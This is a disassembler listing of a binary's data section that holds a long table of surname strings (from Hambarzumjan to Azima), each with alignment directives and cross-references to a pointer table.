aHambarzumjan db 'Hambarzumjan',0 ; DATA XREF: .data:0043CBE0�o
align 10h
aHalpert db 'Halpert',0 ; DATA XREF: .data:0043CBDC�o
aHallowell db 'Hallowell',0 ; DATA XREF: .data:0043CBD8�o
align 4
aHalkias db 'Halkias',0 ; DATA XREF: .data:0043CBD4�o
aHaley db 'Haley',0 ; DATA XREF: .data:0043CBD0�o
align 4
aHackshaw db 'Hackshaw',0 ; DATA XREF: .data:0043CBCC�o
align 10h
aHackman db 'Hackman',0 ; DATA XREF: .data:0043CBC8�o
aHaar db 'Haar',0 ; DATA XREF: .data:0043CBC4�o
align 10h
aHa db 'Ha',0 ; DATA XREF: .data:0043CBC0�o
align 4
aGuo db 'Guo',0 ; DATA XREF: .data:0043CBBC�o
aGunn db 'Gunn',0 ; DATA XREF: .data:0043CBB8�o
align 10h
aGuenthart db 'Guenthart',0 ; DATA XREF: .data:0043CBB4�o
align 4
aGruppe db 'Gruppe',0 ; DATA XREF: .data:0043CBB0�o
align 4
aGruner db 'Gruner',0 ; DATA XREF: .data:0043CBAC�o
align 4
aGrummell db 'Grummell',0 ; DATA XREF: .data:0043CBA8�o
align 4
aGrigoletto db 'Grigoletto',0 ; DATA XREF: .data:0043CBA4�o
align 4
aGriffiths db 'Griffiths',0 ; DATA XREF: .data:0043CBA0�o
align 10h
aGreenfeld db 'Greenfeld',0 ; DATA XREF: .data:0043CB9C�o
align 4
aGreenberg db 'Greenberg',0 ; DATA XREF: .data:0043CB98�o
align 4
aGravell db 'Gravell',0 ; DATA XREF: .data:0043CB94�o
aGozzi db 'Gozzi',0 ; DATA XREF: .data:0043CB90�o
align 4
aGoody db 'Goody',0 ; DATA XREF: .data:0043CB8C�o
align 10h
aGoodearl db 'Goodearl',0 ; DATA XREF: .data:0043CB88�o
align 4
aGood db 'Good',0 ; DATA XREF: .data:0043CB84�o
align 4
aGoncalves db 'Goncalves',0 ; DATA XREF: .data:0043CB80�o
align 10h
aGoldfarb db 'Goldfarb',0 ; DATA XREF: .data:0043CB7C�o
align 4
aGlendon db 'Glendon',0 ; DATA XREF: .data:0043CB78�o
aGlegg db 'Glegg',0 ; DATA XREF: .data:0043CB74�o
align 4
aGleason db 'Gleason',0 ; DATA XREF: .data:0043CB70�o
aGist db 'Gist',0 ; DATA XREF: .data:0043CB6C�o
align 4
aGillispie db 'Gillispie',0 ; DATA XREF: .data:0043CB68�o
align 4
aGill db 'Gill',0 ; DATA XREF: .data:0043CB64�o
align 10h
aGili db 'Gili',0 ; DATA XREF: .data:0043CB60�o
align 4
aGilbert db 'Gilbert',0 ; DATA XREF: .data:0043CB5C�o
aGibson db 'Gibson',0 ; DATA XREF: .data:0043CB58�o
align 4
aGibbens db 'Gibbens',0 ; DATA XREF: .data:0043CB54�o
aGhorai db 'Ghorai',0 ; DATA XREF: .data:0043CB50�o
align 4
aGerrett db 'Gerrett',0 ; DATA XREF: .data:0043CB4C�o
aGeorgi db 'Georgi',0 ; DATA XREF: .data:0043CB48�o
align 4
aGemberling db 'Gemberling',0 ; DATA XREF: .data:0043CB44�o
align 4
aGeller db 'Geller',0 ; DATA XREF: .data:0043CB40�o
align 4
aGaronna db 'Garonna',0 ; DATA XREF: .data:0043CB3C�o
aGarman db 'Garman',0 ; DATA XREF: .data:0043CB38�o
align 4
aGarfield db 'Garfield',0 ; DATA XREF: .data:0043CB34�o
align 4
aGambini db 'Gambini',0 ; DATA XREF: .data:0043CB30�o
aGalwey db 'Galwey',0 ; DATA XREF: .data:0043CB2C�o
align 4
aGaleotti db 'Galeotti',0 ; DATA XREF: .data:0043CB28�o
align 4
aGaggiotti db 'Gaggiotti',0 ; DATA XREF: .data:0043CB24�o
align 10h
aGabrielli db 'Gabrielli',0 ; DATA XREF: .data:0043CB20�o
align 4
aFusaro db 'Fusaro',0 ; DATA XREF: .data:0043CB1C�o
align 4
aFurth db 'Furth',0 ; DATA XREF: .data:0043CB18�o
align 4
aFuller db 'Fuller',0 ; DATA XREF: .data:0043CB14�o
align 4
aFujiiAbe db 'Fujii-Abe',0 ; DATA XREF: .data:0043CB10�o
align 10h
aFrye db 'Frye',0 ; DATA XREF: .data:0043CB0C�o
align 4
aFryberger db 'Fryberger',0 ; DATA XREF: .data:0043CB08�o
align 4
aFrowiss db 'Frowiss',0 ; DATA XREF: .data:0043CB04�o
aFrisken db 'Frisken',0 ; DATA XREF: .data:0043CB00�o
aFriedland db 'Friedland',0 ; DATA XREF: .data:0043CAFC�o
align 10h
aFried db 'Fried',0 ; DATA XREF: .data:0043CAF8�o
align 4
aFreundlich db 'Freundlich',0 ; DATA XREF: .data:0043CAF4�o
align 4
aFreid db 'Freid',0 ; DATA XREF: .data:0043CAF0�o
align 4
aFrazierDavis db 'Frazier-Davis',0 ; DATA XREF: .data:0043CAEC�o
align 4
aFranz db 'Franz',0 ; DATA XREF: .data:0043CAE8�o
align 4
aFranklinKenea db 'Franklin-Kenea',0 ; DATA XREF: .data:0043CAE4�o
align 4
aFrancisco db 'Francisco',0 ; DATA XREF: .data:0043CAE0�o
align 10h
aFossi db 'Fossi',0 ; DATA XREF: .data:0043CADC�o
align 4
aFossey db 'Fossey',0 ; DATA XREF: .data:0043CAD8�o
align 10h
aFortier db 'Fortier',0 ; DATA XREF: .data:0043CAD4�o
aFortes db 'Fortes',0 ; DATA XREF: .data:0043CAD0�o
align 10h
aForester db 'Forester',0 ; DATA XREF: .data:0043CACC�o
align 4
aFolks db 'Folks',0 ; DATA XREF: .data:0043CAC8�o
align 4
aFlores db 'Flores',0 ; DATA XREF: .data:0043CAC4�o
align 4
aFlier db 'Flier',0 ; DATA XREF: .data:0043CAC0�o
align 4
aFitzmaurice db 'Fitzmaurice',0 ; DATA XREF: .data:0043CABC�o
aFisk db 'Fisk',0 ; DATA XREF: .data:0043CAB8�o
align 4
aFiorina db 'Fiorina',0 ; DATA XREF: .data:0043CAB4�o
aFinnegan db 'Finnegan',0 ; DATA XREF: .data:0043CAB0�o
align 4
aFinkelstein db 'Finkelstein',0 ; DATA XREF: .data:0043CAAC�o
aFink db 'Fink',0 ; DATA XREF: .data:0043CAA8�o
align 10h
aField db 'Field',0 ; DATA XREF: .data:0043CAA4�o
align 4
aFido db 'Fido',0 ; DATA XREF: .data:0043CAA0�o
align 10h
aFeuer db 'Feuer',0 ; DATA XREF: .data:0043CA9C�o
align 4
aFerriell db 'Ferriell',0 ; DATA XREF: .data:0043CA98�o
align 4
aFerrante db 'Ferrante',0 ; DATA XREF: .data:0043CA94�o
align 10h
aFernandes db 'Fernandes',0 ; DATA XREF: .data:0043CA90�o
align 4
aFernald db 'Fernald',0 ; DATA XREF: .data:0043CA8C�o
aFeldman db 'Feldman',0 ; DATA XREF: .data:0043CA88�o
aFejzo db 'Fejzo',0 ; DATA XREF: .data:0043CA84�o
align 4
aFeigenbaum db 'Feigenbaum',0 ; DATA XREF: .data:0043CA80�o
align 10h
aFates db 'Fates',0 ; DATA XREF: .data:0043CA7C�o
align 4
aFasso db 'Fasso',27h,0 ; DATA XREF: .data:0043CA78�o
align 10h
aFarren db 'Farren',0 ; DATA XREF: .data:0043CA74�o
align 4
aFarone db 'Farone',0 ; DATA XREF: .data:0043CA70�o
align 10h
aFaris db 'Faris',0 ; DATA XREF: .data:0043CA6C�o
align 4
aFalorsi db 'Falorsi',0 ; DATA XREF: .data:0043CA68�o
aFalcoAcosta db 'Falco-Acosta',0 ; DATA XREF: .data:0043CA64�o
align 10h
aFaioes db 'Faioes',0 ; DATA XREF: .data:0043CA60�o
align 4
aFagan db 'Fagan',0 ; DATA XREF: .data:0043CA5C�o
align 10h
aFabbris db 'Fabbris',0 ; DATA XREF: .data:0043CA58�o
aEverett db 'Everett',0 ; DATA XREF: .data:0043CA54�o
aEuripides db 'Euripides',0 ; DATA XREF: .data:0043CA50�o
align 4
aEtter db 'Etter',0 ; DATA XREF: .data:0043CA4C�o
align 4
aEstes db 'Estes',0 ; DATA XREF: .data:0043CA48�o
align 4
aEspinoza db 'Espinoza',0 ; DATA XREF: .data:0043CA44�o
align 4
aErez db 'Erez',0 ; DATA XREF: .data:0043CA40�o
align 10h
aErdos db 'Erdos',0 ; DATA XREF: .data:0043CA3C�o
align 4
aErdman db 'Erdman',0 ; DATA XREF: .data:0043CA38�o
align 10h
aErbach db 'Erbach',0 ; DATA XREF: .data:0043CA34�o
align 4
aEppling db 'Eppling',0 ; DATA XREF: .data:0043CA30�o
aEnyeart db 'Enyeart',0 ; DATA XREF: .data:0043CA2C�o
aEncinas db 'Encinas',0 ; DATA XREF: .data:0043CA28�o
aElvis db 'Elvis',0 ; DATA XREF: .data:0043CA24�o
align 4
aElmerick db 'Elmerick',0 ; DATA XREF: .data:0043CA20�o
align 4
aElmendorf db 'Elmendorf',0 ; DATA XREF: .data:0043CA1C�o
align 10h
aEliasson db 'Eliasson',0 ; DATA XREF: .data:0043CA18�o
align 4
aEickenhorst db 'Eickenhorst',0 ; DATA XREF: .data:0043CA14�o
aEdward db 'Edward',0 ; DATA XREF: .data:0043CA10�o
align 10h
aEdner db 'Edner',0 ; DATA XREF: .data:0043CA0C�o
align 4
aEdley db 'Edley',0 ; DATA XREF: .data:0043CA08�o
align 10h
aEckel db 'Eckel',0 ; DATA XREF: .data:0043CA04�o
align 4
aEbeling db 'Ebeling',0 ; DATA XREF: .data:0043CA00�o
aEardley db 'Eardley',0 ; DATA XREF: .data:0043C9FC�o
aDwyer db 'Dwyer',0 ; DATA XREF: .data:0043C9F8�o
align 10h
aDussault db 'Dussault',0 ; DATA XREF: .data:0043C9F4�o
align 4
aDurrett db 'Durrett',0 ; DATA XREF: .data:0043C9F0�o
aDuffin db 'Duffin',0 ; DATA XREF: .data:0043C9EC�o
align 4
aDSouza db 'D',27h,'souza',0 ; DATA XREF: .data:0043C9E8�o
aDrinker db 'Drinker',0 ; DATA XREF: .data:0043C9E4�o
aDowsland db 'Dowsland',0 ; DATA XREF: .data:0043C9E0�o
align 4
aDoug db 'Doug',0 ; DATA XREF: .data:0043C9DC�o
align 10h
aDoty db 'Doty',0 ; DATA XREF: .data:0043C9D8�o
align 4
aDosi db 'Dosi',0 ; DATA XREF: .data:0043C9D4�o
align 10h
aDorf db 'Dorf',0 ; DATA XREF: .data:0043C9D0�o
align 4
aDore db 'Dore',0 ; DATA XREF: .data:0043C9CC�o
align 10h
aDoonan db 'Doonan',0 ; DATA XREF: .data:0043C9C8�o
align 4
aDonner db 'Donner',0 ; DATA XREF: .data:0043C9C4�o
align 10h
aDonahue db 'Donahue',0 ; DATA XREF: .data:0043C9C0�o
aDoherty db 'Doherty',0 ; DATA XREF: .data:0043C9BC�o
aDockery db 'Dockery',0 ; DATA XREF: .data:0043C9B8�o
aDirksen db 'Dirksen',0 ; DATA XREF: .data:0043C9B4�o
aDionysius db 'Dionysius',0 ; DATA XREF: .data:0043C9B0�o
align 4
aDilworth db 'Dilworth',0 ; DATA XREF: .data:0043C9AC�o
align 4
aDifronzo db 'Difronzo',0 ; DATA XREF: .data:0043C9A8�o
align 4
aDifabio db 'Difabio',0 ; DATA XREF: .data:0043C9A4�o
aDiefenbach db 'Diefenbach',0 ; DATA XREF: .data:0043C9A0�o
align 4
aDicks db 'Dicks',0 ; DATA XREF: .data:0043C99C�o
align 10h
aDFini db 'D',27h,'fini',0 ; DATA XREF: .data:0043C998�o
align 4
aDeutsch db 'Deutsch',0 ; DATA XREF: .data:0043C994�o
aDesombre db 'Desombre',0 ; DATA XREF: .data:0043C990�o
align 4
aDenison db 'Denison',0 ; DATA XREF: .data:0043C98C�o
aDenham db 'Denham',0 ; DATA XREF: .data:0043C988�o
align 4
aDenault db 'Denault',0 ; DATA XREF: .data:0043C984�o
aDemusz db 'Demusz',0 ; DATA XREF: .data:0043C980�o
align 4
aDempster db 'Dempster',0 ; DATA XREF: .data:0043C97C�o
align 4
aDeming db 'Deming',0 ; DATA XREF: .data:0043C978�o
align 10h
aDellAcqua db 'Dell',27h,'acqua',0 ; DATA XREF: .data:0043C974�o
align 4
aDelger db 'Delger',0 ; DATA XREF: .data:0043C970�o
align 4
aDeleonRendon db 'Deleon-Rendon',0 ; DATA XREF: .data:0043C96C�o
align 4
aDelattre db 'Delattre',0 ; DATA XREF: .data:0043C968�o
align 10h
aDefeciani db 'Defeciani',0 ; DATA XREF: .data:0043C964�o
align 4
aDees db 'Dees',0 ; DATA XREF: .data:0043C960�o
align 4
aDebroff db 'Debroff',0 ; DATA XREF: .data:0043C95C�o
aDerousse db 'deRousse',0 ; DATA XREF: .data:0043C958�o
align 4
aDelEnclos db 'del',27h,'Enclos',0 ; DATA XREF: .data:0043C954�o
align 4
aDelapena db 'DeLaPena',0 ; DATA XREF: .data:0043C950�o
align 10h
aDegennaro db 'DeGennaro',0 ; DATA XREF: .data:0043C94C�o
align 4
aDawkins db 'Dawkins',0 ; DATA XREF: .data:0043C948�o
aDavid db 'David',0 ; DATA XREF: .data:0043C944�o
align 4
aDaskalu db 'Daskalu',0 ; DATA XREF: .data:0043C940�o
aDasgupta db 'Dasgupta',0 ; DATA XREF: .data:0043C93C�o
align 10h
aDas db 'Das',0 ; DATA XREF: .data:0043C938�o
aDArcangelo db 'D',27h,'arcangelo',0 ; DATA XREF: .data:0043C934�o
aDapice db 'Dapice',0 ; DATA XREF: .data:0043C930�o
align 4
aDante db 'Dante',0 ; DATA XREF: .data:0043C92C�o
align 10h
aDanieli db 'Danieli',0 ; DATA XREF: .data:0043C928�o
aDAmbra db 'D',27h,'Ambra',0 ; DATA XREF: .data:0043C924�o
aDaly db 'Daly',0 ; DATA XREF: .data:0043C920�o
align 4
aDaldalian db 'Daldalian',0 ; DATA XREF: .data:0043C91C�o
align 4
aDasilva db 'daSilva',0 ; DATA XREF: .data:0043C918�o
aCyders db 'Cyders',0 ; DATA XREF: .data:0043C914�o
align 4
aCvek db 'Cvek',0 ; DATA XREF: .data:0043C910�o
align 4
aCutler db 'Cutler',0 ; DATA XREF: .data:0043C90C�o
align 4
aCurrier db 'Currier',0 ; DATA XREF: .data:0043C908�o
aCui db 'Cui',0 ; DATA XREF: .data:0043C904�o
aCroxton db 'Croxton',0 ; DATA XREF: .data:0043C900�o
aCroxen db 'Croxen',0 ; DATA XREF: .data:0043C8FC�o
align 10h
aCroshaw db 'Croshaw',0 ; DATA XREF: .data:0043C8F8�o
aCrocker db 'Crocker',0 ; DATA XREF: .data:0043C8F4�o
aCrawford db 'Crawford',0 ; DATA XREF: .data:0043C8F0�o
align 4
aCoutaux db 'Coutaux',0 ; DATA XREF: .data:0043C8EC�o
aCounter db 'Counter',0 ; DATA XREF: .data:0043C8E8�o
aCosmides db 'Cosmides',0 ; DATA XREF: .data:0043C8E4�o
align 4
aCornish db 'Cornish',0 ; DATA XREF: .data:0043C8E0�o
aCorey db 'Corey',0 ; DATA XREF: .data:0043C8DC�o
align 4
aConnors db 'Connors',0 ; DATA XREF: .data:0043C8D8�o
aCondodina db 'Condodina',0 ; DATA XREF: .data:0043C8D4�o
align 4
aConcino db 'Concino',0 ; DATA XREF: .data:0043C8D0�o
aComstock db 'Comstock',0 ; DATA XREF: .data:0043C8CC�o
align 10h
aCompton db 'Compton',0 ; DATA XREF: .data:0043C8C4�o
; .data:0043C8C8�o
aCollis db 'Collis',0 ; DATA XREF: .data:0043C8C0�o
align 10h
aCollard db 'Collard',0 ; DATA XREF: .data:0043C8BC�o
aColella db 'Colella',0 ; DATA XREF: .data:0043C8B8�o
aColdren db 'Coldren',0 ; DATA XREF: .data:0043C8B4�o
aCoito db 'Coito',0 ; DATA XREF: .data:0043C8B0�o
align 10h
aCoblenz db 'Coblenz',0 ; DATA XREF: .data:0043C8AC�o
aClow db 'Clow',0 ; DATA XREF: .data:0043C8A8�o
align 10h
aClifton db 'Clifton',0 ; DATA XREF: .data:0043C8A4�o
aClement db 'Clement',0 ; DATA XREF: .data:0043C8A0�o
aClark db 'Clark',0 ; DATA XREF: .data:0043C89C�o
align 4
aClancy db 'Clancy',0 ; DATA XREF: .data:0043C898�o
align 10h
aClaffey db 'Claffey',0 ; DATA XREF: .data:0043C894�o
aCifarelli db 'Cifarelli',0 ; DATA XREF: .data:0043C890�o
align 4
aCicero db 'Cicero',0 ; DATA XREF: .data:0043C88C�o
align 4
aCiampaglia db 'Ciampaglia',0 ; DATA XREF: .data:0043C888�o
align 4
aChurch db 'Church',0 ; DATA XREF: .data:0043C884�o
align 10h
aChupasko db 'Chupasko',0 ; DATA XREF: .data:0043C880�o
align 4
aChu db 'Chu',0 ; DATA XREF: .data:0043C87C�o
aChristopher db 'Christopher',0 ; DATA XREF: .data:0043C878�o
aChristie db 'Christie',0 ; DATA XREF: .data:0043C874�o
align 4
aChristiano db 'Christiano',0 ; DATA XREF: .data:0043C870�o
align 4
aChristian db 'Christian',0 ; DATA XREF: .data:0043C86C�o
align 10h
aChristenson db 'Christenson',0 ; DATA XREF: .data:0043C868�o
aChinman db 'Chinman',0 ; DATA XREF: .data:0043C864�o
aChinipardaz db 'Chinipardaz',0 ; DATA XREF: .data:0043C860�o
aChilds db 'Childs',0 ; DATA XREF: .data:0043C85C�o
align 4
aChildress db 'Childress',0 ; DATA XREF: .data:0043C858�o
align 4
aChien db 'Chien',0 ; DATA XREF: .data:0043C854�o
align 4
aChiassino db 'Chiassino',0 ; DATA XREF: .data:0043C850�o
align 4
aChervinsky db 'Chervinsky',0 ; DATA XREF: .data:0043C84C�o
align 4
aCherry db 'Cherry',0 ; DATA XREF: .data:0043C848�o
align 4
aCheang db 'Cheang',0 ; DATA XREF: .data:0043C844�o
align 4
aCharles db 'Charles',0 ; DATA XREF: .data:0043C840�o
aChapman db 'Chapman',0 ; DATA XREF: .data:0043C83C�o
aCerioli db 'Cerioli',0 ; DATA XREF: .data:0043C838�o
aCeniceros db 'Ceniceros',0 ; DATA XREF: .data:0043C834�o
align 4
aCavell db 'Cavell',0 ; DATA XREF: .data:0043C830�o
align 10h
aCavanagh db 'Cavanagh',0 ; DATA XREF: .data:0043C82C�o
align 4
aCastelda db 'Castelda',0 ; DATA XREF: .data:0043C828�o
align 4
aCaspar db 'Caspar',0 ; DATA XREF: .data:0043C824�o
align 10h
aCase db 'Case',0 ; DATA XREF: .data:0043C820�o
align 4
aCascio db 'Cascio',0 ; DATA XREF: .data:0043C81C�o
align 10h
aCartmill db 'Cartmill',0 ; DATA XREF: .data:0043C818�o
align 4
aCarper db 'Carper',0 ; DATA XREF: .data:0043C814�o
align 4
aCaroti db 'Caroti',0 ; DATA XREF: .data:0043C810�o
align 4
aCarmichael db 'Carmichael',0 ; DATA XREF: .data:0043C80C�o
align 4
aCarlyle db 'Carlyle',0 ; DATA XREF: .data:0043C808�o
aCarlos db 'Carlos',0 ; DATA XREF: .data:0043C804�o
align 4
aCarlin db 'Carlin',0 ; DATA XREF: .data:0043C800�o
align 10h
aCarayannopoulo db 'Carayannopoulos',0 ; DATA XREF: .data:0043C7FC�o
aCaratozzolo db 'Caratozzolo',0 ; DATA XREF: .data:0043C7F8�o
aCapursi db 'Capursi',0 ; DATA XREF: .data:0043C7F4�o
aCappuccio db 'Cappuccio',0 ; DATA XREF: .data:0043C7F0�o
align 10h
aCapodilupo db 'Capodilupo',0 ; DATA XREF: .data:0043C7EC�o
align 4
aCapocaccia db 'Capocaccia',0 ; DATA XREF: .data:0043C7E8�o
align 4
aCaperton db 'Caperton',0 ; DATA XREF: .data:0043C7E4�o
align 4
aCapanni db 'Capanni',0 ; DATA XREF: .data:0043C7E0�o
aCanley db 'Canley',0 ; DATA XREF: .data:0043C7DC�o
align 4
aCammilleri db 'Cammilleri',0 ; DATA XREF: .data:0043C7D8�o
align 10h
aCammelli db 'Cammelli',0 ; DATA XREF: .data:0043C7D4�o
align 4
aCalnan db 'Calnan',0 ; DATA XREF: .data:0043C7D0�o
align 4
aCage db 'Cage',0 ; DATA XREF: .data:0043C7CC�o
align 4
aByrd db 'Byrd',0 ; DATA XREF: .data:0043C7C8�o
align 4
aByerly db 'Byerly',0 ; DATA XREF: .data:0043C7C4�o
align 4
aByatt db 'Byatt',0 ; DATA XREF: .data:0043C7C0�o
align 4
aBusetta db 'Busetta',0 ; DATA XREF: .data:0043C7BC�o
aBurridge db 'Burridge',0 ; DATA XREF: .data:0043C7B8�o
align 4
aBurke db 'Burke',0 ; DATA XREF: .data:0043C7B4�o
align 10h
aBurdzy db 'Burdzy',0 ; DATA XREF: .data:0043C7B0�o
align 4
aBurden db 'Burden',0 ; DATA XREF: .data:0043C7AC�o
align 10h
aBunton db 'Bunton',0 ; DATA XREF: .data:0043C7A8�o
align 4
aBullard db 'Bullard',0 ; DATA XREF: .data:0043C7A4�o
aBudding db 'Budding',0 ; DATA XREF: .data:0043C7A0�o
aBuchan db 'Buchan',0 ; DATA XREF: .data:0043C79C�o
align 10h
aBrzycki db 'Brzycki',0 ; DATA XREF: .data:0043C798�o
aBrook db 'Brook',0 ; DATA XREF: .data:0043C794�o
align 10h
aBroca db 'Broca',0 ; DATA XREF: .data:0043C790�o
align 4
aBritz db 'Britz',0 ; DATA XREF: .data:0043C78C�o
align 10h
aBrinton db 'Brinton',0 ; DATA XREF: .data:0043C788�o
aBridges db 'Bridges',0 ; DATA XREF: .data:0043C784�o
aBridgeman db 'Bridgeman',0 ; DATA XREF: .data:0043C780�o
align 4
aBrewer db 'Brewer',0 ; DATA XREF: .data:0043C778�o
; .data:0043C77C�o
align 4
aBrennan db 'Brennan',0 ; DATA XREF: .data:0043C774�o
aBrenan db 'Brenan',0 ; DATA XREF: .data:0043C770�o
align 4
aBreed db 'Breed',0 ; DATA XREF: .data:0043C76C�o
align 4
aBrecht db 'Brecht',0 ; DATA XREF: .data:0043C768�o
align 4
aBradach db 'Bradach',0 ; DATA XREF: .data:0043C764�o
aBradac db 'Bradac',0 ; DATA XREF: .data:0043C760�o
align 4
aBracalente db 'Bracalente',0 ; DATA XREF: .data:0043C75C�o
align 10h
aBoyne db 'Boyne',0 ; DATA XREF: .data:0043C758�o
align 4
aBoym db 'Boym',0 ; DATA XREF: .data:0043C754�o
align 10h
aBoyland db 'Boyland',0 ; DATA XREF: .data:0043C750�o
aBoyes db 'Boyes',0 ; DATA XREF: .data:0043C74C�o
align 10h
aBoyajian db 'Boyajian',0 ; DATA XREF: .data:0043C748�o
align 4
aBoxer db 'Boxer',0 ; DATA XREF: .data:0043C744�o
align 4
aBowers db 'Bowers',0 ; DATA XREF: .data:0043C740�o
align 4
aBourneuf db 'Bourneuf',0 ; DATA XREF: .data:0043C73C�o
align 4
aBoudrot db 'Boudrot',0 ; DATA XREF: .data:0043C738�o
aBoudin db 'Boudin',0 ; DATA XREF: .data:0043C734�o
align 4
aBotosh db 'Botosh',0 ; DATA XREF: .data:0043C730�o
align 10h
aBothman db 'Bothman',0 ; DATA XREF: .data:0043C72C�o
aBossi db 'Bossi',0 ; DATA XREF: .data:0043C728�o
align 10h
aBorden db 'Borden',0 ; DATA XREF: .data:0043C724�o
align 4
aBorack db 'Borack',0 ; DATA XREF: .data:0043C720�o
align 10h
aBoorstin db 'Boorstin',0 ; DATA XREF: .data:0043C71C�o
align 4
aBoone db 'Boone',0 ; DATA XREF: .data:0043C718�o
align 4
aBookbinder db 'Bookbinder',0 ; DATA XREF: .data:0043C714�o
align 10h
aBook db 'Book',0 ; DATA XREF: .data:0043C710�o
align 4
aBontempo db 'Bontempo',0 ; DATA XREF: .data:0043C70C�o
align 4
aBoniface db 'Boniface',0 ; DATA XREF: .data:0043C708�o
align 10h
aBonham db 'Bonham',0 ; DATA XREF: .data:0043C704�o
align 4
aBoner db 'Boner',0 ; DATA XREF: .data:0043C700�o
align 10h
aBologna db 'Bologna',0 ; DATA XREF: .data:0043C6FC�o
aBollinger db 'Bollinger',0 ; DATA XREF: .data:0043C6F8�o
align 4
aBolick db 'Bolick',0 ; DATA XREF: .data:0043C6F4�o
align 4
aBolger db 'Bolger',0 ; DATA XREF: .data:0043C6F0�o
align 4
aBlyth db 'Blyth',0 ; DATA XREF: .data:0043C6EC�o
align 4
aBloxham db 'Bloxham',0 ; DATA XREF: .data:0043C6E8�o
aBloemhof db 'Bloemhof',0 ; DATA XREF: .data:0043C6E4�o
align 10h
aBloembergen db 'Bloembergen',0 ; DATA XREF: .data:0043C6E0�o
aBloch db 'Bloch',0 ; DATA XREF: .data:0043C6DC�o
align 4
aBlizard db 'Blizard',0 ; DATA XREF: .data:0043C6D8�o
aBliss db 'Bliss',0 ; DATA XREF: .data:0043C6D4�o
align 4
aBlanke db 'Blanke',0 ; DATA XREF: .data:0043C6D0�o
align 4
aBlakemore db 'Blakemore',0 ; DATA XREF: .data:0043C6CC�o
align 4
aBlagg db 'Blagg',0 ; DATA XREF: .data:0043C6C8�o
align 10h
aBlackwell db 'Blackwell',0 ; DATA XREF: .data:0043C6C4�o
align 4
aBlackbourn db 'Blackbourn',0 ; DATA XREF: .data:0043C6C0�o
align 4
aBisho db 'Bisho',0 ; DATA XREF: .data:0043C6BC�o
align 10h
aBisema db 'Bisema',0 ; DATA XREF: .data:0043C6B8�o
align 4
aBir db 'Bir',0 ; DATA XREF: .data:0043C6B4�o
aBinion db 'Binion',0 ; DATA XREF: .data:0043C6B0�o
align 4
aBickel db 'Bickel',0 ; DATA XREF: .data:0043C6AC�o
align 4
aBiagioli db 'Biagioli',0 ; DATA XREF: .data:0043C6A8�o
align 4
aBeynart db 'Beynart',0 ; DATA XREF: .data:0043C6A4�o
aBetti db 'Betti',0 ; DATA XREF: .data:0043C6A0�o
align 4
aBerrizbeitia db 'Berrizbeitia',0 ; DATA XREF: .data:0043C69C�o
align 4
aBernston db 'Bernston',0 ; DATA XREF: .data:0043C698�o
align 4
aBernassola db 'Bernassola',0 ; DATA XREF: .data:0043C694�o
align 10h
aBernardo db 'Bernardo',0 ; DATA XREF: .data:0043C690�o
align 4
aBerkeJenkins db 'Berke-Jenkins',0 ; DATA XREF: .data:0043C68C�o
align 4
aBergson db 'Bergson',0 ; DATA XREF: .data:0043C688�o
aBenedictDye db 'Benedict-Dye',0 ; DATA XREF: .data:0043C684�o
align 4
aBelloc db 'Belloc',0 ; DATA XREF: .data:0043C680�o
align 4
aBellini db 'Bellini',0 ; DATA XREF: .data:0043C67C�o
aBellhouse db 'Bellhouse',0 ; DATA XREF: .data:0043C678�o
align 10h
aBellavance db 'Bellavance',0 ; DATA XREF: .data:0043C674�o
align 4
aBelinCollart db 'Belin-Collart',0 ; DATA XREF: .data:0043C670�o
align 4
aBelfer db 'Belfer',0 ; DATA XREF: .data:0043C66C�o
align 4
aBelaoussof db 'Belaoussof',0 ; DATA XREF: .data:0043C668�o
align 10h
aBelanger db 'Belanger',0 ; DATA XREF: .data:0043C664�o
align 4
aBehenna db 'Behenna',0 ; DATA XREF: .data:0043C660�o
aBedford db 'Bedford',0 ; DATA XREF: .data:0043C65C�o
aBeder db 'Beder',0 ; DATA XREF: .data:0043C658�o
align 4
aBeckman db 'Beckman',0 ; DATA XREF: .data:0043C654�o
aBean db 'Bean',0 ; DATA XREF: .data:0043C650�o
align 4
aBeal db 'Beal',0 ; DATA XREF: .data:0043C64C�o
align 4
aBeacon db 'Beacon',0 ; DATA XREF: .data:0043C648�o
align 4
aBayo db 'Bayo',0 ; DATA XREF: .data:0043C644�o
align 4
aBayles db 'Bayles',0 ; DATA XREF: .data:0043C640�o
align 4
aBaumiller db 'Baumiller',0 ; DATA XREF: .data:0043C63C�o
align 10h
aBatchelder db 'Batchelder',0 ; DATA XREF: .data:0043C638�o
align 4
aBashevis db 'Bashevis',0 ; DATA XREF: .data:0043C634�o
align 4
aBasavappa db 'Basavappa',0 ; DATA XREF: .data:0043C630�o
align 4
aBartoo db 'Bartoo',0 ; DATA XREF: .data:0043C62C�o
align 4
aBartolome db 'Bartolome',0 ; DATA XREF: .data:0043C628�o
align 4
aBartholomew db 'Bartholomew',0 ; DATA XREF: .data:0043C624�o
aBarry db 'Barry',0 ; DATA XREF: .data:0043C620�o
align 4
aBarriola db 'Barriola',0 ; DATA XREF: .data:0043C61C�o
align 4
aBarnett db 'Barnett',0 ; DATA XREF: .data:0043C618�o
aBarneson db 'Barneson',0 ; DATA XREF: .data:0043C614�o
align 4
aBarbetti db 'Barbetti',0 ; DATA XREF: .data:0043C610�o
align 4
aBarberi db 'Barberi',0 ; DATA XREF: .data:0043C60C�o
aBaranowska db 'Baranowska',0 ; DATA XREF: .data:0043C608�o
align 4
aBaranczak db 'Baranczak',0 ; DATA XREF: .data:0043C604�o
align 4
aBarajas db 'Barajas',0 ; DATA XREF: .data:0043C600�o
aBarabesi db 'Barabesi',0 ; DATA XREF: .data:0043C5FC�o
align 4
aBanta db 'Banta',0 ; DATA XREF: .data:0043C5F8�o
align 4
aBaltz db 'Baltz',0 ; DATA XREF: .data:0043C5F4�o
align 4
aBallew db 'Ballew',0 ; DATA XREF: .data:0043C5F0�o
align 4
aBallatori db 'Ballatori',0 ; DATA XREF: .data:0043C5EC�o
align 10h
aBaleja db 'Baleja',0 ; DATA XREF: .data:0043C5E8�o
align 4
aBakanowsky db 'Bakanowsky',0 ; DATA XREF: .data:0043C5E4�o
align 4
aBailar db 'Bailar',0 ; DATA XREF: .data:0043C5E0�o
align 4
aBagnold db 'Bagnold',0 ; DATA XREF: .data:0043C5DC�o
aBaglivo db 'Baglivo',0 ; DATA XREF: .data:0043C5D8�o
aBady db 'Bady',0 ; DATA XREF: .data:0043C5D4�o
align 4
aBackus db 'Backus',0 ; DATA XREF: .data:0043C5D0�o
align 4
aBachmuth db 'Bachmuth',0 ; DATA XREF: .data:0043C5CC�o
align 4
aAzima db 'Azima',0 ; DATA XREF: .data:0043C5C8�o
align 10h
